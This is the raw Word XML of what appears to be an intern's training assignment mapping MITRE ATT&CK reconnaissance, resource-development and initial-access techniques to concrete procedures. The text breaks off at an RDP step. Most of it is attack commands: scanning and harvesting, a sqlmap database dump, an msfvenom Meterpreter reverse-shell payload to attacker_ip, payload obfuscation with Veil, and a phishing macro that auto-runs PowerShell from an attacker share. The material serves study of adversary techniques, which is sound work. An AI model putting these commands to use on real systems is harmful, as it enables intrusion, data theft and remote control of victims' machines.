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851F1" w14:textId="162ED2D1" w:rsidR="006D2390" w:rsidRPr="001137E2" w:rsidRDefault="001137E2" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Name :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008B6328">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaitanya P Mayekar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEC6609" w14:textId="64AE84F0" w:rsidR="006D2390" w:rsidRDefault="006D2390" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Intern </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>id :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="008B6328">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="001137E2">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2254B6BE" w14:textId="32AE7E36" w:rsidR="001137E2" w:rsidRDefault="001137E2" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Deadline :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Tuesday</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7058BE" w14:textId="10D02D71" w:rsidR="001137E2" w:rsidRDefault="001137E2" w:rsidP="007A5D4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Submit to</w:t>
      </w:r>
      <w:r w:rsidR="008B6328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:</w:t>
      </w:r>
      <w:r w:rsidR="008B6328">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Digisuraksha Pahari foundation </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383099FB" w14:textId="77777777" w:rsidR="001137E2" w:rsidRPr="001137E2" w:rsidRDefault="001137E2" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A135F27" w14:textId="77777777" w:rsidR="006D2390" w:rsidRPr="001137E2" w:rsidRDefault="006D2390" w:rsidP="007A5D49">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Topic: Structured PoC (Proof of Concept) </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TTPs(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001137E2">
        <w:rPr>
          <w:rFonts w:ascii="Arial Rounded MT Bold" w:hAnsi="Arial Rounded MT Bold"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tactics, Techniques, and Procedures)              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48090275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1.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Reconnaissance (TA0043)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB01587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Gather information about the target using public sources or direct probing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A369969" w14:textId="4A223A43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1: T1598 – Gather Victim Network Information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA821EC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gathers network details to identify targets and attack vectors.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2A06DE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Use Shodan to enumerate external services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03564BF8" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>shodan host target_ip_or_domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20AD09FD" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Scan the organization’s public IP range to find live hosts and services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964FEC9" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>nmap -sS -Pn -p 1-65535 target_ip_range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228F30A0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Perform WHOIS lookup for additional information:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A49282A" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>whois targetdomain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1396BC63" w14:textId="314A5DD3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T1595 – Active Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C5CF60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actively scans for vulnerabilities and services.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B14C32" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Full port and banner scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C50E73" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>nmap -sV -A targetdomain.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC84E63" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Automated vulnerability scan using OpenVAS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5873E210" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>openvas-start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B45F32" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>openvas -T target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B4E3C5" w14:textId="0CFE2CE4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T1592 – Search Open Websites/Domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092D7E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gathers information from websites and social media.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C71A2DE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Google dorking for exposed files:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81F258" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>site:target.com filetype:pdf confidential</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3AFB30" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Use theHarvester to collect email addresses and subdomains:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C34118" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>theHarvester -d target.com -b google</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A51BB3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Scrape LinkedIn (manual/automated) for employee details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D245DBE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2.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Resource Development (TA0042)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272D3950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Build or acquire the infrastructure and tools for the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFC6C23" w14:textId="1D2E3EE0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1: T1583 – Acquire Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ACD256C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sets up C2 domains, servers, and communication points.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B218E9B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Register new domain (phishing/C2) via registrar or API:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11689924" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>curl -X POST -d @domain_info.json https://api.registrar.com/v1/domains</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C7C2D5" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Deploy Command &amp; Control (C2) server (example for cloud VPS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8A4D88" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>curl -X POST -d @server_setup.json https://api.cloudprovider.com/v1/servers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACD2078" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Create anonymous email addresses via webmail providers (manual/web UI).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6348B3" w14:textId="122ECB4E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T1584 – Compromise Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE8E234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takes control of existing third-party platforms or resources.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3AC35F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Scan and target third-party site with nikto and nmap:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B661596" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>nikto -host vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565701EB" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>nmap -sV vulnerable-website.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F179D2" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Find/exploit SQL injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DB6B3E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>sqlmap -u "http://vulnerable-website.com/page?id=1" --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AE1053" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Gain access to cloud storage via weak credentials or cloud misconfigurations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B52215" w14:textId="283A1E18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T1587 – Develop Capabilities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE968F9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creates or customizes malware/tools for offensive operations.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386D277F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Write PowerShell execution-policy bypass script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E910389" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C4174CA" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve">Set-ExecutionPolicy Bypass -Scope </w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve"> -Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="662A30F0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Build custom payload with msfvenom:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA452EE" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>msfvenom -p windows/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 -f exe -o payload.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A0E7C4E" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Obfuscate payloads via tools like Veil/Evasion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C3A250" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>python3 ~/Veil/Veil.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1436B912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3.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Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1266B17F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Obtain the first foothold inside the target environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B41355" w14:textId="58A13F61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T1566.001 – Phishing: Spearphishing Attachment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F564E36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Custom phishing emails deliver weaponized files for execution.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D035F82" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Craft Office doc with malicious macro:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7573DBA9" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>Sub AutoOpen()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BECFA3" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t xml:space="preserve">  Shell "powershell.exe -ExecutionPolicy Bypass -File \\attacker\payload.ps1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B309A1F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>End Sub</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2295857C" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Send email using SMTP or tools like sendEmail/Thunderbird.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2EA0F0" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Document download/execution triggers connection back to attacker’s C2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E10E8C" w14:textId="3D096313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T1190 – Exploit Public-Facing Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F7F843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Exploit internet-exposed vulnerabilities for access.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27FBEF4B" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>Identify vulnerable webapp, then use Metasploit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0717D8A1" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DE5DCC" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>use exploit/windows/http/some_vuln</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1359F" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>set RHOST target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2032FECA" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F653FAE" w14:textId="2C2AACE4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T1078 – Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A48EE2C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 obtained credentials for legitimate system access.</w:t>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="007A5D49">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Procedures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE5E067" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>SSH login with leaked creds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDEC821" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>ssh user@target_ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70B06570" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="008B6328">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="007A5D49">
        <w:t>RDP login on Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A307685" w14:textId="77777777" w:rsidR="007A5D49" w:rsidRPr="007A5D49" w:rsidRDefault="007A5D49" w:rsidP="007A5D49">
      <w:r w:rsidRPr="007A5D49">
        <w:t>powershell</w:t>
      </w:r>
    </w:p>
